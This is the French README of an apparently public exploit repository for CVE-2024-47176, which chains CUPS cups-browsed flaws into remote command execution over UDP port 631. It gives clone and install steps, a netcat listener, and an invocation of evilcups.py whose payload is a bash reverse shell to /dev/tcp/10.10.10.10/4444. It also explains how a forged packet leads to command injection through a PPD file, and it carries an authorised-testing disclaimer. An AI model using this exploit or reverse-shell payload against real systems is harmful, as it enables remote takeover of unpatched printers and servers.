
Exploit Python pour CVE-2024-47176 permettant l'exécution de commandes à distance dans CUPS cups-browsed via des paquets UDP conçus. Inclut la livraison de charge utile de reverse shell pour des tests d'intrusion autorisés.
Uniquement à des fins éducatives et de tests de pénétration autorisés.
(Common UNIX Printing System) est un système d'impression open-source qui gère les imprimantes réseau. CVE-2024-47176 cible le démon , qui écoute sur et fait aveuglément confiance aux paquets provenant de n'importe quelle source.
cups-browsedINADDR_ANY:631En forgeant un paquet UDP malveillant qui déclenche une requête IPP Get-Printer-Attributes, un attaquant peut forcer cups-browsed à se connecter à un serveur contrôlé par l'attaquant — et en combinant cela avec les vulnérabilités ci-dessous, atteindre l'exécution arbitraire de commandes à distance.
| Composant | Condition |
|---|---|
cups-browsed | Écoute sur UDP 631 (par défaut) |
| CUPS < 2.4.11 | Versions non patchées |
| Systèmes Linux avec CUPS exposé | Port 631 accessible depuis l'attaquant |
| CVE | Description |
|---|---|
| CVE-2024-47176 | cups-browsed fait confiance à tout paquet UDP sur le port 631 |
| CVE-2024-47076 | libcupsfilters ne nettoie pas les attributs IPP |
| CVE-2024-47175 | libppd injecte des données non nettoyées dans les fichiers PPD |
| CVE-2024-47177 | cups-filters permet l'exécution de commandes via PPD |
nmap (optionnel, pour la reconnaissance)1. Clonez le dépôt :
git clone https://github.com/gumerzzzindo/cve-2024-47176.git
cd cve-2024-47176
2. Installez la dépendance Python requise :
pip install ippserver
3. Lancez un listener sur votre machine :
nc -lvnp <PORT>
./evilcups.py <IP_ATTAQUANT> <IP_CIBLE> "<COMMANDE>"
Exemple — shell inverse :
./evilcups.py 10.10.10.10 10.10.11.40 "bash -c 'bash -i >& /dev/tcp/10.10.10.10/4444 0>&1'"
Après avoir exécuté l'exploit, déclenchez un travail d'impression sur la cible (ou attendez une vérification automatique) pour exécuter la charge utile.
Ce dépôt est destiné uniquement à des fins éducatives et à la recherche en sécurité autorisée. Utiliser cet outil contre des systèmes que vous ne possédez pas ou pour lesquels vous n'avez pas d'autorisation écrite explicite est illégal et contraire à l'éthique.